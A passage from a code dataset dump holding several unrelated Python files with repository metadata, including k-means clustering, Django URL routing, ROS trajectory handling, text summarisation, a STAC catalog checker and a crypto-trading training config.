euclid(vectora, vectorb):\n assert len(vectora) == len(vectorb)\n return np.linalg.norm(vectora - vectorb)\n\ndef cossim(vectora, vectorb):\n numerator = np.dot(vectora, vectorb)\n denominator = np.linalg.norm(vectora) * np.linalg.norm(vectorb)\n if denominator == 0:\n return 0\n else:\n return numerator / denominator\n \n\nK = 10\n\ncentroids = np.zeros((K, V), dtype = 'float64')\n\nchosenpoints = list()\n\nrandom.seed()\nr = random.randrange(D)\nchosenpoints.append(r)\n\n# We only select starting centroids from a limited subset of chars.\n\nDsub = 12000\nif D < Dsub:\n Dsub = D\n\n# The range is k-1 because we already chose one at random.\n\nfor i in range(K - 1):\n distances = np.ones(Dsub) * 90000000\n\n for j in range(Dsub):\n\n for k in chosenpoints:\n thisdist = euclid(docvector(j), docvector(k))\n if thisdist < distances[j]:\n distances[j] = thisdist\n\n distances = distances / np.sum(distances)\n\n r = random.random()\n traversed = 0\n chosen = 0\n\n for j in range(Dsub):\n traversed += distances[j]\n if r <= traversed:\n chosen = j\n break\n\n chosenpoints.append(chosen)\n print(\"Formed cluster #\" + str(i))\n\nfor idx, point in enumerate(chosenpoints):\n centroids[idx, : ] = docvector(point)\n\n# Main k-means loop\n\nitermax = 25\n\ndivisors = np.ones((K))\n \nfor iteration in range(itermax):\n\n print(\"Iteration #\" + str(iteration))\n\n pointassignments = np.ones((D)) * -1\n\n for i in range(D):\n\n mindist = 90000000\n closest = -1\n\n for j in range(K):\n\n thisdist = euclid(docvector(i), centroids[j, :]) * divisors[j]\n\n if thisdist < mindist:\n mindist = thisdist\n closest = j\n\n if closest > -1:\n pointassignments[i] = closest\n else:\n print(\"Error in point assignment: mindist not found.\")\n\n assert len(pointassignments) == D\n\n sizes = list()\n \n for j in range(K):\n\n members = np.where(pointassignments == j)[0]\n sizes.append(len(members))\n \n if len(members) < 1:\n print(\"Cluster lacks members: reassignment\")\n members = [random.randrange(D)]\n\n newcentroid = np.zeros((V))\n\n for member in members:\n newcentroid = newcentroid + docvector(member)\n\n newcentroid = newcentroid / len(members)\n\n centroids[j, : ] = newcentroid\n\n print(sizes)\n for j in range(K):\n divisors[j] = divisors[j] + (math.log(sizes[j] + 1) / 1000)\n\nmeancentroid = np.zeros((V))\n\nfor j in range(K):\n meancentroid = meancentroid + (centroids[j, :] * sizes[j])\nmeancentroid = meancentroid / D\n\noverrepresentation = np.zeros((K, V))\n\nfor j in range(K):\n difference = centroids[j, :] - meancentroid\n orderedindices = difference.argsort()\n print(\"Cluster \" + str(j))\n\n for termidx in orderedindices[-20:]:\n print(terms[termidx])\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"tedunderwood/GenreProject","sub_path":"python/utilities/kmeansplus.py","file_name":"kmeansplus.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"29021147895","text":"from django.urls import path\r\nfrom .views import *\r\n\r\nurlpatterns = [\r\n path('group/get/', group_view, name='get_group_view'),\r\n path('group/create/', group_view, name='create_group_view'),\r\n path('group/update//', group_view, name='update_group_view'),\r\n path('group/delete//', group_view, name='delete_group_view'),\r\n path('group/get//', group_view, name='get_one_group_view'),\r\n\r\n path('create/', task_view, name='create_task_view'),\r\n path('get/', get_task_view, name='get_task_view'),\r\n path('get//', get_task_view, 
name='get_one_task_view'),\r\n path('update//', task_view, name='update_task_view'),\r\n path('delete//', task_view, name='delete_task_view'),\r\n\r\n path('comment/create/', task_comment_view, name=\"create_task_comment_view\"),\r\n path('comment/get/', task_comment_view, name=\"get_task_comment_view\"),\r\n path('comment/update//', task_comment_view, name=\"update_task_comment_view\"),\r\n path('comment/delete//', task_comment_view, name=\"delete_task_comment_view\"),\r\n\r\n path('file-management/create/', task_file_management_view, name=\"create_task_file_management_view\"),\r\n path('file-management/get/', task_file_management_view, name=\"get_task_file_management_view\"),\r\n path('file-management/delete//', task_file_management_view, name=\"delete_task_file_management_view\"),\r\n path('file-management/get//', task_file_management_view, name=\"get_one_task_file_management_view\"),\r\n\r\n path('reassign//', reassign_task_view, name='reassign_task_view'),\r\n path('log-activity/get/', task_log_activity_view, name='task_log_activity_view'),\r\n]\r\n","repo_name":"lokeshsahu01/connect_globes","sub_path":"PLR_APIs/TMS/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18010060609","text":"#! /usr/bin/env python3\n\nimport rospy\nfrom geometry_msgs.msg import Pose, Twist, PoseArray, PoseStamped, TwistStamped, Transform, Vector3\nfrom nav_msgs.msg import Path\nfrom trajectory_msgs.msg import MultiDOFJointTrajectory, MultiDOFJointTrajectoryPoint\nfrom tricopter.srv import *\nfrom viz_functions import *\n\nclass trajectoryHandler:\n def __init__(self, frequency, max_vel, max_acc, max_yawrate, max_yawrate_dot):\n self.frequency = frequency\n self.max_vel = max_vel\n self.max_acc = max_acc\n self.max_yawrate = max_yawrate\n self.max_yawrate_dot = max_yawrate_dot\n self.waypoint_prefix = \"waypoints\"\n self.print_frame_id = \"stewart_base\"\n\n self._point_count = 0 \n self._tooltip_trajectory = MultiDOFJointTrajectory()\n\n self._n_layers = rospy.get_param(str(self.waypoint_prefix)+'/n_layers')\n\n # publishers for visualisation only\n self._pub_toolpath_viz = rospy.Publisher('/viz/toolpath', Path, queue_size=1)\n self._pub_print_viz = rospy.Publisher('/viz/print', Path, queue_size=1) \n\n # publish print visualisation periodically\n rospy.Timer(rospy.Duration(5.0), self._viz_timer_cb, reset=True)\n\n def follow_print_trajectory(self):\n header = self._tooltip_trajectory.header\n \n tooltip_pose = PoseStamped(header=header)\n tooltip_velocity = TwistStamped(header=header)\n tooltip_acceleration = TwistStamped(header=header)\n\n if self._point_count < len(self._tooltip_trajectory.points): \n tooltip_pose, tooltip_velocity, tooltip_acceleration = self._read_trajectory(self._tooltip_trajectory, self._point_count)\n self._point_count += 1\n complete = False\n else: \n complete = True\n self._point_count = 0\n \n return tooltip_pose, tooltip_velocity, tooltip_acceleration, complete\n\n def generate_print_layer(self, layer_number):\n self._point_count = 0 #ensure point count is reset in case last trajectory was interrupted\n print_waypoints = self._fetch_waypoints_from_yaml(layer_number)\n self._tooltip_trajectory = self._TOPPRA_interpolation(print_waypoints)\n publish_viz_trajectory(self._tooltip_trajectory, self._pub_toolpath_viz)\n # return drone_trajectory, tooltip_trajectory\n\n def _read_trajectory(self, trajectory, point_num):\n pose = PoseStamped()\n velocity 
= TwistStamped()\n acceleration = TwistStamped() \n pose.header.stamp = rospy.Time.now()\n pose.header.frame_id = trajectory.header.frame_id\n velocity.header = pose.header\n acceleration.header = pose.header\n pose.pose.position = trajectory.points[point_num].transforms[0].translation\n pose.pose.orientation = trajectory.points[point_num].transforms[0].rotation\n velocity.twist = trajectory.points[point_num].velocities[0]\n acceleration.twist = trajectory.points[point_num].accelerations[0]\n return pose, velocity, acceleration\n\n def _fetch_waypoints_from_yaml(self, layer_number):\n # get poses from file\n rospy.wait_for_service('fetch_poses')\n get_poses = rospy.ServiceProxy('fetch_poses', fetchPoses)\n request = fetchPosesRequest()\n request.prefix = self.waypoint_prefix\n request.frame_id = self.print_frame_id\n request.layer_number = layer_number\n response = get_poses(request)\n return response.poses\n\n def _TOPPRA_interpolation(self, poses):\n #interpolate with TOPPRA\n rospy.wait_for_service('get_TOPPRA_trajectory')\n get_traj = rospy.ServiceProxy('get_TOPPRA_trajectory', TOPPRATrajectory)\n request = TOPPRATrajectoryRequest()\n request.frequency = self.frequency\n request.max_vel = self.max_vel\n request.max_acc = self.max_acc\n request.max_yawrate = self.max_yawrate\n request.max_yawrate_dot = self.max_yawrate_dot\n request.poses = poses\n response = get_traj(request)\n return response.trajectory\n\n def _viz_timer_cb(self, event):\n publish_viz_print(self._pub_print_viz)","repo_name":"lachie-aerialrobotics/delta_2","sub_path":"scripts/trajectories/trajectory_handler.py","file_name":"trajectory_handler.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73423998351","text":"from django.conf import settings\n\n# Number of messages to display per page.\nMESSAGES_PER_PAGE = getattr(settings, 'ROSETTA_MESSAGES_PER_PAGE', 10)\n\n\n# Enable Google translation suggestions\nENABLE_TRANSLATION_SUGGESTIONS = getattr(settings, 'ROSETTA_ENABLE_TRANSLATION_SUGGESTIONS', False)\n# Can be obtained for free here: https://ssl.bing.com/webmaster/Developers/AppIds/\nBING_APP_ID = getattr(settings, 'BING_APP_ID', None)\n\n# Displays this language beside the original MSGID in the admin\nMAIN_LANGUAGE = getattr(settings, 'ROSETTA_MAIN_LANGUAGE', None)\n\n# Change these if the source language in your PO files isn't English\nMESSAGES_SOURCE_LANGUAGE_CODE = getattr(settings, 'ROSETTA_MESSAGES_SOURCE_LANGUAGE_CODE', 'en')\nMESSAGES_SOURCE_LANGUAGE_NAME = getattr(settings, 'ROSETTA_MESSAGES_SOURCE_LANGUAGE_NAME', 'English')\n\n\n\"\"\"\nWhen running WSGI daemon mode, using mod_wsgi 2.0c5 or later, this setting\ncontrols whether the contents of the gettext catalog files should be\nautomatically reloaded by the WSGI processes each time they are modified.\n\nNotes:\n\n * The WSGI daemon process must have write permissions on the WSGI script file\n (as defined by the WSGIScriptAlias directive.)\n * WSGIScriptReloading must be set to On (it is by default)\n * For performance reasons, this setting should be disabled in production environments\n * When a common rosetta installation is shared among different Django projects,\n each one running in its own distinct WSGI virtual host, you can activate\n auto-reloading in individual projects by enabling this setting in the project's\n own configuration file, i.e. 
in the project's settings.py\n\nRefs:\n\n * http://code.google.com/p/modwsgi/wiki/ReloadingSourceCode\n * http://code.google.com/p/modwsgi/wiki/ConfigurationDirectives#WSGIReloadMechanism\n\n\"\"\"\nWSGI_AUTO_RELOAD = getattr(settings, 'ROSETTA_WSGI_AUTO_RELOAD', False)\nUWSGI_AUTO_RELOAD = getattr(settings, 'ROSETTA_UWSGI_AUTO_RELOAD', False)\n\n\n# Exclude applications defined in this list from being translated\nEXCLUDED_APPLICATIONS = getattr(settings, 'ROSETTA_EXCLUDED_APPLICATIONS', ())\n\n","repo_name":"evrenesat/ganihomes","sub_path":"rosetta/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"83"} +{"seq_id":"3696659374","text":"import abc\nimport typing\n\nimport pandas as pd\nimport pandas_ta\n\nfrom . import human, vectorbt, logic, traversers, quantconnect\n\n\nclass Transpiler():\n @abc.abstractstaticmethod\n def convert_to_string(cls, root_node: dict) -> str:\n raise NotImplementedError()\n\nclass HumanTextTranspiler():\n @staticmethod\n def convert_to_string(root_node: dict) -> str:\n return human.convert_to_pretty_format(root_node)\n\nclass QuantConnectTranspiler():\n @staticmethod\n def convert_to_string(root_node: dict) -> str:\n return quantconnect.output_strategy(root_node)\n\n\n#\n# TODO: include this inside vectorbt output\n#\ndef precompute_indicator(close_series: pd.Series, indicator: str, window_days: int):\n close = close_series.dropna()\n if indicator == logic.ComposerIndicatorFunction.CUMULATIVE_RETURN:\n # because comparisons will be to whole numbers\n return close.pct_change(window_days) * 100\n elif indicator == logic.ComposerIndicatorFunction.MOVING_AVERAGE_PRICE:\n return pandas_ta.sma(close, window_days)\n elif indicator == logic.ComposerIndicatorFunction.RSI:\n return pandas_ta.rsi(close, window_days)\n elif indicator == logic.ComposerIndicatorFunction.EMA_PRICE:\n return pandas_ta.ema(close, window_days)\n elif indicator == logic.ComposerIndicatorFunction.CURRENT_PRICE:\n return close_series\n elif indicator == logic.ComposerIndicatorFunction.STANDARD_DEVIATION_PRICE:\n return pandas_ta.stdev(close, window_days)\n elif indicator == logic.ComposerIndicatorFunction.STANDARD_DEVIATION_RETURNS:\n return pandas_ta.stdev(close.pct_change() * 100, window_days)\n elif indicator == logic.ComposerIndicatorFunction.MAX_DRAWDOWN:\n # this seems pretty close\n maxes = close.rolling(window_days, min_periods=1).max()\n downdraws = (close/maxes) - 1.0\n return downdraws.rolling(window_days, min_periods=1).min() * -100\n elif indicator == logic.ComposerIndicatorFunction.MOVING_AVERAGE_RETURNS:\n return close.pct_change().rolling(window_days).mean() * 100\n else:\n raise NotImplementedError(\n \"Have not implemented indicator \" + indicator)\n\n\nclass VectorBTTranspiler():\n @staticmethod\n def convert_to_string(root_node: dict) -> str:\n return vectorbt.convert_to_vectorbt(root_node)\n\n @staticmethod\n def execute(root_node: dict, closes: pd.DataFrame) -> typing.Tuple[pd.DataFrame, pd.DataFrame]:\n code = VectorBTTranspiler.convert_to_string(root_node)\n locs = {}\n exec(code, None, locs)\n build_allocations_matrix = locs['build_allocations_matrix']\n\n allocations, branch_tracker = build_allocations_matrix(closes)\n\n allocateable_tickers = traversers.collect_allocateable_assets(\n root_node)\n\n # remove tickers that were never intended for allocation\n for reference_only_ticker in [c for c in allocations.columns if c not in 
allocateable_tickers]:\n del allocations[reference_only_ticker]\n\n allocations_possible_start = closes[list(\n allocateable_tickers)].dropna().index.min().date()\n # truncate until allocations possible (branch_tracker is not truncated)\n allocations = allocations[allocations.index.date >=\n allocations_possible_start]\n\n return allocations, branch_tracker\n\n\ndef main():\n from . import symphony_object, get_backtest_data\n\n symphony_id = \"KvA0KYc57MQSyykdWcFs\"\n symphony = symphony_object.get_symphony(symphony_id)\n root_node = symphony_object.extract_root_node_from_symphony_response(\n symphony)\n\n print(HumanTextTranspiler.convert_to_string(root_node))\n print(VectorBTTranspiler.convert_to_string(root_node))\n\n tickers = traversers.collect_referenced_assets(root_node)\n\n closes = get_backtest_data.get_backtest_data(tickers)\n\n #\n # Execute logic\n #\n allocations, branch_tracker = VectorBTTranspiler.execute(\n root_node, closes)\n\n backtest_start = allocations.dropna().index.min().date()\n\n allocations_aligned = allocations[allocations.index.date >= backtest_start]\n branch_tracker_aligned = branch_tracker[branch_tracker.index.date >= backtest_start]\n\n assert len(allocations_aligned) == len(branch_tracker_aligned)\n\n print(allocations_aligned[(\n allocations_aligned.sum(axis=1) - 1).abs() > 0.0001])\n branches_by_failed_allocation_days = branch_tracker_aligned[(\n allocations_aligned.sum(axis=1) - 1).abs() > 0.0001].sum(axis=0)\n branches_with_failed_allocation_days = branches_by_failed_allocation_days[\n branches_by_failed_allocation_days != 0].index.values\n\n for branch_id in branches_with_failed_allocation_days:\n print(f\" -> id={branch_id}\")\n print(allocations_aligned[branch_tracker_aligned[branch_id] == 1])\n","repo_name":"androslee/compose_symphony_parser","sub_path":"lib/transpilers.py","file_name":"transpilers.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"83"} +{"seq_id":"44068141645","text":"'''\nZałóżmy, że podatek dochodowy wyliczany jest według następujących stawek:\n-Przychody do 4000 zł nie są opodatkowane. \n-Przychody pomiędzy 4000 a 90000 zł są objęte stawką 20% podatku.\n-Przychody powyżej 90000 zł objęte są stawką 30% podatku. \nNapisz program, który dla podanej (w zł) kwoty obliczy należny podatek dochodowy.\nW swoim rozwiązaniu wyszczególnij:\n-funkcję czy_poprawny(), która jako argument przyjmuje wysokość dochodu i\nzwraca prawdę lub fałsz w zależności od tego czy odchód nie jest ujemny;\nfunkcję wylicz_podatek(), która przyjmuje jako argumenty wysokość dochodu oraz\nstawkę procentową podatku, a zwraca wyskość podatku\n-funkcję main(), w której przeprowadzisz interakcję z uzytkownikiem - pobierzesz\nod niego dane o wysokości podatku i sprawdzisz jego poprawność, a następnie\ngdy wszystko będzie ok to za pomocą odpowiednich instrukcji\nwarunkowych wyznaczysz stawkę podatku, na koniec wylicz podatek dochodowy\nkorzystając ze swojej funkcji wylicz_podatek() i wypisz na ekranie komunikat\nile on wynosi. 
Pamiętaj aby wypisać komunikat o niepoprawnych danych!\nRozwiązanie załącz w postaci pliku *.py.\n'''\n\ndef wylicz_podatek(dochod, stawka):\n return dochod * stawka\ndef czy_poprawny(c):\n if c >= 0:\n return True\n return False\ndef main():\n d = float(input('Podaj swój dochód: '))\n if czy_poprawny(d):\n if d <= 4000:\n p = wylicz_podatek(d, 0)\n elif d > 4000 and d <= 90000:\n p = wylicz_podatek(d, 0.2)\n else:\n p = wylicz_podatek(d, 0.3)\n print(\"Podatek od dochodu\", d,\"zł wyniesie\", p, \"zł.\")\n else:\n print(\"Dochód nie może być ujemny!\")\nmain()\n \n","repo_name":"majsylw/Introduction-to-programming-in-python","sub_path":"Laboratory 07/1 - Powtórzenie-podatek.py","file_name":"1 - Powtórzenie-podatek.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"42508404321","text":"from math import sqrt\nfrom sys import stdin \n\nn=int(stdin.readline())\ngraph=[[] for i in range(n)]\ndp=[[1000000000]*(1< UNKNOWN PATH')\n\n# List loaded from non_commercial_datasets.jsonnet\nNON_COMMERCIAL_LIST = []\n\nSKIP_FEATUREVIEW_GENERATION = 'gee:skip_featureview_generation'\n\nCHECKER_CODE_ROOT = 'https://github.com/google/earthengine-catalog/blob/main'\n\n# Legacy id for a top-level dataset\nFIRMS = 'FIRMS'\n\n\n_StrEnum = (\n (enum.StrEnum,) if sys.version_info[:2] >= (3, 11) else (str, enum.Enum)\n)\n\n\nclass StacType(*_StrEnum):\n CATALOG = 'Catalog'\n COLLECTION = 'Collection'\n\n\nclass GeeType(*_StrEnum):\n IMAGE = 'image'\n IMAGE_COLLECTION = 'image_collection'\n TABLE = 'table'\n TABLE_COLLECTION = 'table_collection'\n # For catalogs\n NONE = 'none'\n\n\ndef data_root() -> pathlib.Path:\n return (\n pathlib.Path(os.path.dirname(__file__)) /\n '..')\n\n\ndef stac_root() -> pathlib.Path:\n return data_root() / 'catalog'\n\n\ndef examples_root() -> pathlib.Path:\n # First try for a local path for bazel.\n path = pathlib.Path('examples')\n if path.is_dir(): return path\n\n # blaze has Fileset support\n return data_root() / 'examples/javascript_examples'\n\n\ndef previews_root() -> pathlib.Path:\n # First try for a local path for bazel.\n path = pathlib.Path('examples')\n if path.is_dir(): return path\n\n # blaze has Fileset support\n return data_root() / 'examples/javascript_previews'\n\n\ndef url_id_for_dataset_id(dataset_id: str) -> str:\n \"\"\"Converts a dataset id into a string suitable for use in a URL.\"\"\"\n assert dataset_id\n return dataset_id.replace('/', '_')\n\n\n@dataclasses.dataclass\nclass Node:\n \"\"\"Container for one STAC Catalog or STAC Collection.\"\"\"\n id: str\n path: pathlib.Path\n type: StacType\n gee_type: GeeType\n stac: dict[str, object] # The result of json.load\n\n\nclass IssueLevel(*_StrEnum):\n \"\"\"How serious is an issue.\"\"\"\n WARNING = 'warning'\n ERROR = 'error'\n\n\n@dataclasses.dataclass\nclass Issue:\n \"\"\"A record of one issue found in a STAC node.\"\"\"\n id: str\n path: pathlib.Path\n check_name: str\n message: str\n level: IssueLevel = IssueLevel.ERROR\n\n def __str__(self):\n return (\n f'Issue(\\'{self.id}\\', \\'{str(self.path)}\\', \\'{self.check_name}\\', '\n f'\\'{self.message}\\', IssueLevel.{self.level})')\n\n\nclass Check:\n \"\"\"Parent class for all checks.\"\"\"\n name: str = 'unknown'\n\n @classmethod\n def new_issue(cls,\n node: Node,\n message: str,\n level: IssueLevel = IssueLevel.ERROR) -> Issue:\n \"\"\"Creates a new Issue for the given arguments.\"\"\"\n\n # Find the relative path to the checker that produced the 
error.\n    relative_path = []\n    for component in reversed(cls.__module__.split('.')):\n      if component == 'earthengine_catalog':\n        break\n      relative_path.insert(0, component)\n    module = '/'.join(relative_path)\n    link = f'{CHECKER_CODE_ROOT}/{module}.py'\n    # Changing the checker filename to have extension .jsonnet rather than .json\n    return Issue(\n        node.id, node.path.with_suffix('.jsonnet'), link, message, level\n    )\n\n\nclass NodeCheck(Check):\n  \"\"\"One node check.\"\"\"\n\n  @classmethod\n  def run(cls, node: Node) -> Iterator[Issue]:\n    raise NotImplementedError\n\n\nclass TreeCheck(Check):\n  \"\"\"One tree check.\"\"\"\n\n  @classmethod\n  def run(cls, nodes: list[Node]) -> Iterator[Issue]:\n    raise NotImplementedError\n\n\n# TODO(schwehr): Allow a list of regex for the ids.\ndef load(root: pathlib.Path) -> list[Node]:\n  \"\"\"Returns a list of Nodes.\"\"\"\n  root_len = len(root.parts)\n  nodes: list[Node] = []\n  for path in root.rglob('*.json'):\n    relative_path = pathlib.Path(*path.parts[root_len:])\n\n    stac = json.loads(path.read_text())\n    dataset_id = stac.get('id', UNKNOWN_ID + str(relative_path))\n    asset_type = stac.get(TYPE)\n\n    gee_type_str = stac.get(GEE_TYPE)\n    gee_type: Optional[GeeType]\n    try:\n      gee_type = GeeType(gee_type_str)\n    except ValueError:\n      gee_type = GeeType.NONE\n    nodes.append(Node(dataset_id, relative_path, asset_type, gee_type, stac))\n  return nodes\n\n\ndef is_in_non_commercial(dataset_id: str) -> bool:\n  global NON_COMMERCIAL_LIST\n  if not NON_COMMERCIAL_LIST:\n    non_commercial_file = data_root() / 'non_commercial_datasets.json'\n    NON_COMMERCIAL_LIST = json.loads(non_commercial_file.read_text())\n  return dataset_id in NON_COMMERCIAL_LIST\n","repo_name":"google/earthengine-catalog","sub_path":"checker/stac.py","file_name":"stac.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"83"} +{"seq_id":"23638729591","text":"#\n# By Sofia Sorokina, August 2021\n#\nfrom __future__ import absolute_import\nfrom __future__ import division, print_function, unicode_literals\n\nfrom sumy.parsers.html import HtmlParser\nfrom sumy.parsers.plaintext import PlaintextParser\nfrom sumy.nlp.tokenizers import Tokenizer\nfrom sumy.summarizers.lsa import LsaSummarizer as Summarizer\nfrom sumy.nlp.stemmers import Stemmer\nfrom sumy.utils import get_stop_words\n\nLANGUAGE = \"english\"\nSENTENCES_COUNT = 5\n\nif __name__ == \"__main__\":\n    for x in range(1,4):\n        for y in [\"Order\", \"Random\"]:\n            #read the all tweets file and perform summarization\n            i = str(x)\n\n            parser = PlaintextParser.from_file(\"TwitterData/run\"+i+\"/\" +y+\"AllTweets\"+i+\".txt\", Tokenizer(LANGUAGE))\n            stemmer = Stemmer(LANGUAGE)\n            summarizer = Summarizer(stemmer)\n            summarizer.stop_words = get_stop_words(LANGUAGE)\n            line = \"\"\n\n            #create (and truncate) the summary file up front\n            open(\"SUMY-summaries/\"+y+\"Summary\"+i+\".txt\",\"w\").close()\n            print(\"========= Summary \"+y+\" \"+i+\" =========\")\n            for sentence in summarizer(parser.document, SENTENCES_COUNT):\n                print(sentence)\n                line += (str(sentence) + \". \")
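\n            # each sentence is appended with a trailing \". \", so line[:-1] below trims the stray final space before saving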
\")\n print(\"========= End of summary \"+y+\" \"+i+\" =========\\n\")\n\n f= open(\"SUMY-summaries/\"+y+\"Summary\"+i+\".txt\",\"a\")\n f.write(line[:-1])","repo_name":"SofiaSorokina/DialectFairnessMetrics","sub_path":"SofiaMetrics/SUMY-Bot/SUMY-Bot.py","file_name":"SUMY-Bot.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37140124259","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\")\ninput = sys.stdin.readline\n\nSZ = 10000001\n\n\ndef cnt_primelike(p, L, R):\n cnt = 0\n num = p ** 2\n while num < L:\n num *= p\n while num <= R:\n cnt += 1\n R = num * p\n return cnt\n\n\nif __name__ == \"__main__\":\n is_prime = [True for _ in range(SZ)]\n for i in range(2, SZ):\n for j in range(i + i, SZ, i):\n if not is_prime[i]: continue\n\n is_prime[j] = False\n\n primes = []\n for i in range(2, SZ):\n if is_prime[i]:\n primes.append(i)\n\n L, R = map(int, input().rstrip().split())\n cnt = 0\n for i in range(len(primes)):\n if primes[i] ** 2 > R:\n break\n\n cnt += cnt_primelike(primes[i], L, R)\n print(cnt)\n","repo_name":"AlphaTechnic/Algorithm_Study","sub_path":"2021_random_set_self_practice/using_python/1465.py","file_name":"1465.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5056981062","text":"\"\"\"\nThis code defines various settings and functions for training a machine learning model.\n\nThe trade start date in combinations with the amount of candles required for training and validation determine all\nother parameters automatically.\n\nThe function nCr calculates the number of ways to choose r elements from a set of n elements, also known as a combination.\n\nThe settings defined in this script include the random seed SEED_CFG, the time frame TIMEFRAME,\nthe number of trials H_TRIALS,\nthe number of groups used for testing K_TEST_GROUPS,\nthe number of paths NUM_PATHS,\nthe number of K-fold cross validation groups KCV_groups\nthe number of groups N_GROUPS,\nthe number of splits NUMBER_OF_SPLITS,\nthe start and end date for the trade period trade_start_date\nthe trade_end_date,\nthe number of candles for training no_candles_for_train\nthe validation no_candles_for_val\nthe list of tickers TICKER_LIST,\nthe minimum buy limits ALPACA_LIMITS,\nthe list of technical indicators TECHNICAL_INDICATORS_LIST.\n\nThe function calculate_start_end_dates is used to compute the start and end dates for training and validation based on the number of candles and the selected time frame.\n\n\"\"\"\n\nfrom datetime import datetime, timedelta\nimport numpy as np\nimport operator as op\nfrom functools import reduce\n\n\ndef nCr(n, r):\n r = min(r, n-r)\n numer = reduce(op.mul, range(n, n-r, -1), 1)\n denom = reduce(op.mul, range(1, r+1), 1)\n return numer // denom # or / in Python 2\n\n\n# General Training Settings\n#######################################################################################################\n#######################################################################################################\n\ntrade_start_date = '2022-04-30 00:00:00'\ntrade_end_date = '2022-06-27 00:00:00'\n\nSEED_CFG = 2390408\nTIMEFRAME = '5m'\nH_TRIALS = 50\nKCV_groups = 5\nK_TEST_GROUPS = 2\nNUM_PATHS = 4\nN_GROUPS = NUM_PATHS + 1\nNUMBER_OF_SPLITS = nCr(N_GROUPS, N_GROUPS - K_TEST_GROUPS)\n\nprint(NUMBER_OF_SPLITS)\n\nno_candles_for_train = 20000\nno_candles_for_val = 5000\n\nTICKER_LIST = 
\n\n\n# General Training Settings\n#######################################################################################################\n#######################################################################################################\n\ntrade_start_date = '2022-04-30 00:00:00'\ntrade_end_date = '2022-06-27 00:00:00'\n\nSEED_CFG = 2390408\nTIMEFRAME = '5m'\nH_TRIALS = 50\nKCV_groups = 5\nK_TEST_GROUPS = 2\nNUM_PATHS = 4\nN_GROUPS = NUM_PATHS + 1\nNUMBER_OF_SPLITS = nCr(N_GROUPS, N_GROUPS - K_TEST_GROUPS)\n\nprint(NUMBER_OF_SPLITS)\n\nno_candles_for_train = 20000\nno_candles_for_val = 5000\n\nTICKER_LIST = ['AAVEUSDT',\n               'AVAXUSDT',\n               'BTCUSDT',\n               'NEARUSDT',\n               'LINKUSDT',\n               'ETHUSDT',\n               'LTCUSDT',\n               'MATICUSDT',\n               'UNIUSDT',\n               'SOLUSDT',\n               ]\n\n\n# Minimum buy limits\nALPACA_LIMITS = np.array([0.01,\n                          0.10,\n                          0.0001,\n                          0.1,\n                          0.1,\n                          0.001,\n                          0.01,\n                          10,\n                          0.1,\n                          0.01\n                          ])\n\n\nTECHNICAL_INDICATORS_LIST = ['open',\n                             'high',\n                             'low',\n                             'close',\n                             'volume',\n                             'macd',\n                             'macd_signal',\n                             'macd_hist',\n                             'rsi',\n                             'cci',\n                             'dx'\n                             ]\n\n\n# Auto compute all necessary dates based on candle distribution\n#######################################################################################################\n#######################################################################################################\n\ndef calculate_start_end_dates(candlewidth):\n    candle_to_no_minutes = {'1m': 1, '5m': 5, '10m': 10, '30m': 30, '1h': 60, '2h': 2*60, '4h': 4*60, '12h': 12*60}\n    no_minutes = candle_to_no_minutes[candlewidth]\n\n    trade_start_date_datetimeObj = datetime.strptime(trade_start_date, \"%Y-%m-%d %H:%M:%S\")\n\n    # train start date = trade_start_date - (no_c_t + no_c_v)\n    train_start_date = (trade_start_date_datetimeObj\n                        - timedelta(minutes=no_minutes * (no_candles_for_train\n                                                          + no_candles_for_val))).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n    # train end date = trade_start_date - (no_c_v + 1)\n    train_end_date = (trade_start_date_datetimeObj\n                      - timedelta(minutes=no_minutes * (no_candles_for_val + 1))).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n    # validation start date = trade_start_date - no_c_v\n    val_start_date = (trade_start_date_datetimeObj\n                      - timedelta(minutes=no_minutes * no_candles_for_val)).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n    # validation end date = trade_start_date - 1\n    val_end_date = (trade_start_date_datetimeObj\n                    - timedelta(minutes=no_minutes * 1)).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n    return train_start_date, train_end_date, val_start_date, val_end_date\n\n\nTRAIN_START_DATE, TRAIN_END_DATE, VAL_START_DATE, VAL_END_DATE = calculate_start_end_dates(TIMEFRAME)\nprint(\"TRAIN_START_DATE: \", TRAIN_START_DATE)\nprint(\"VAL_END_DATE: \", VAL_END_DATE)\n","repo_name":"Burntt/FinRL_Crypto","sub_path":"config_main.py","file_name":"config_main.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"63"} +{"seq_id":"1747538550","text":"from django.db import IntegrityError\nfrom django.db.models import F\nfrom rest_framework import serializers\n\nfrom care.facility.api.serializers import TIMESTAMP_FIELDS\nfrom care.facility.models import (\n    ROOM_TYPES,\n    FacilityInventoryItem,\n    FacilityInventoryItemTag,\n    FacilityInventoryLog,\n    FacilityInventorySummary,\n    FacilityInventoryUnit,\n    FacilityInventoryUnitConverter,\n    FacilityInventoryMinQuantity,\n)\n\nfrom config.serializers import ChoiceField\n\n\nclass 